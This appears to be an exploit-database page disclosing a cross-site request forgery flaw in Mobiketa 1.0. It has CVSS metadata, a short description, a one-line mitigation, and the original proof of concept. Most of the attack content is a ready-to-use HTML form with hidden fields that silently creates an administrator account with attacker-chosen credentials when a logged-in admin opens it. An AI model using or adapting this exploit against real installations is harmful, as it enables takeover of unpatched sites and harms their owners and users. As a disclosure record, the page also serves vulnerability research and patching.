Mobiketa - CSRF Add Admin Exploit

vendor:

Mobiketa

by:

Murat YILMAZLAR

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Mobiketa

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:ynetinteractive:mobiketa:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2016

Mobiketa – CSRF Add Admin Exploit

A CSRF vulnerability exists in Mobiketa 1.0 which allows an attacker to add an admin user to the application. An attacker can craft a malicious HTML page containing a form with hidden fields and submit it to the vulnerable application. The form contains the parameters required to add an admin user to the application. Upon successful submission, the attacker can gain access to the application as an admin user.

Mitigation:

The application should implement a CSRF token to verify the authenticity of the request.

Source

Exploit-DB raw data:

<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST"
enctype="multipart/form-data">
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="name" value="murat&#32;y" />
      <input type="hidden" name="email"
value="murrat&#64;protonmail&#46;com" />
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="password" value="123123123" />
      <input type="hidden" name="id" value="15" />
      <input type="hidden" name="update" value="&#13;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->